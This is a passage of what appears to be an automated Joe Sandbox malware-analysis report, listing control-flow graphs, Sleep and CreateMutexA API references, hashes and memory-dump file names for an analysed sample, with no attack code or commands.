                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 83db5ad967c2a4d9213b1299bf178d18ba4695c044a7eeddf20258d581df72c7
                                                                                                                                                                                                                                                                • Instruction ID: 92a484ef3ecb481b15386407a2d59acce7604ad13fc4a487ae4926eb0448bf3b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83db5ad967c2a4d9213b1299bf178d18ba4695c044a7eeddf20258d581df72c7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9831F571B002049BEB0C9BB8D8C9BADBB62FB95316F244718E814E72D5D77599888713

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 421 85a682-85a6a2 425 85a6a4-85a6b0 421->425 426 85a6d0-85a6ec 421->426 427 85a6c6-85a6cd call 86d663 425->427 428 85a6b2-85a6c0 425->428 429 85a6ee-85a6fa 426->429 430 85a71a-85a739 426->430 427->426 428->427 431 85a949 428->431 433 85a710-85a717 call 86d663 429->433 434 85a6fc-85a70a 429->434 435 85a767-85a916 call 8680c0 430->435 436 85a73b-85a747 430->436 439 85a94e-85a994 call 886c6a Sleep CreateMutexA 431->439 440 85a949 call 886c6a 431->440 433->430 434->431 434->433 442 85a75d-85a764 call 86d663 436->442 443 85a749-85a757 436->443 453 85a9a7-85a9a8 439->453 454 85a996-85a998 439->454 440->439 442->435 443->431 443->442 454->453 455 85a99a-85a9a5 454->455 455->453
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: c134381366a59a354da9afc656b6e5cb3148c3dbdff419c93bd73f6cac54055f
                                                                                                                                                                                                                                                                • Instruction ID: 3043f3b33834c81245006e17d6b051c4d1be5299093176c4966ae98e645e55e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c134381366a59a354da9afc656b6e5cb3148c3dbdff419c93bd73f6cac54055f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE3107317042049BEB0C9B78DCC9BAEBBA2FB95312F248718E814E72D5C77599888753

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 457 859adc-859ae8 458 859afe-859d91 call 86d663 call 867a00 call 855c10 call 858b30 call 868220 call 867a00 call 855c10 call 858b30 call 868220 457->458 459 859aea-859af8 457->459 459->458 460 85a917 459->460 462 85a953-85a994 Sleep CreateMutexA 460->462 463 85a917 call 886c6a 460->463 468 85a9a7-85a9a8 462->468 469 85a996-85a998 462->469 463->462 469->468 471 85a99a-85a9a5 469->471 471->468
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: b727a5b048e34d3bd21b7e9f62eb55032b15a904f5462b1d4aa02b91404757f1
                                                                                                                                                                                                                                                                • Instruction ID: a2164093438e7073242a818552af9e26ede524fc0021f6bfd0e541d802f86eb5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b727a5b048e34d3bd21b7e9f62eb55032b15a904f5462b1d4aa02b91404757f1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C213731704204DBFB189B6CECC9BADB762FBD1312F204319E818D73D5D7769A848612

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 525 85a856-85a86e 526 85a870-85a87c 525->526 527 85a89c-85a89e 525->527 528 85a892-85a899 call 86d663 526->528 529 85a87e-85a88c 526->529 530 85a8a0-85a8a7 527->530 531 85a8a9-85a8b1 call 857d30 527->531 528->527 529->528 532 85a94e-85a987 call 886c6a Sleep CreateMutexA 529->532 534 85a8eb-85a916 call 8680c0 530->534 542 85a8e4-85a8e6 531->542 543 85a8b3-85a8bb call 857d30 531->543 546 85a98e-85a994 532->546 542->534 543->542 547 85a8bd-85a8c5 call 857d30 543->547 548 85a9a7-85a9a8 546->548 549 85a996-85a998 546->549 547->542 553 85a8c7-85a8cf call 857d30 547->553 549->548 551 85a99a-85a9a5 549->551 551->548 553->542 557 85a8d1-85a8d9 call 857d30 553->557 557->542 560 85a8db-85a8e2 557->560 560->534
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 0085A963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,008B3254), ref: 0085A981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758665126.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758709605.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758811555.00000000008B9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758829107.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758847335.00000000008C5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758863602.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758880113.00000000008C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1758988832.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759006705.0000000000A23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759077688.0000000000A4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759099138.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759119254.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759135222.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759152937.0000000000A50000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759170379.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759191927.0000000000A64000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759208782.0000000000A65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759227993.0000000000A74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759246571.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759265870.0000000000A80000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759313909.0000000000AB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759332810.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759350409.0000000000AB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759368234.0000000000ABD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759386499.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759406553.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759425441.0000000000ACB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759443643.0000000000ACF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759461082.0000000000AD0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759478994.0000000000AD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759500180.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759517673.0000000000B27000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759573056.0000000000B3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759591946.0000000000B40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759610705.0000000000B55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759633764.0000000000B56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759651909.0000000000B57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759670977.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759689172.0000000000B5F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759710977.0000000000B6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1759729050.0000000000B6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_850000_file.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 28869d976403fe70abd68e51a7e2c59ff01d4b47052f0d997bc630083a647317
                                                                                                                                                                                                                                                                • Instruction ID: a06f3aac0c601994645727362b67065860fdd92375430eb5982eb669a1fd76f3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28869d976403fe70abd68e51a7e2c59ff01d4b47052f0d997bc630083a647317
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14217F31345204DBFB2C676CD8DA77EB762FF81302F244A26ED04D63C1CA7A49488153

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 502 85a34f-85a35b 503 85a371-85a39a call 86d663 502->503 504 85a35d-85a36b 502->504 510 85a39c-85a3a8 503->510 511 85a3c8-85a916 call 8680c0 503->511 504->503 505 85a93a 504->505 507 85a953-85a994 Sleep CreateMutexA 505->507 508 85a93a call 886c6a 505->508 517 85a9a7-85a9a8 507->517 518 85a996-85a998 507->518 508->507 512 85a3be-85a3c5 call 86d663 510->512 513 85a3aa-85a3b8 510->513 512->511 513->505 513->512 518->517 521 85a99a-85a9a5 518->521 521->517
                                                                                                                                                                                                                                                                APIs
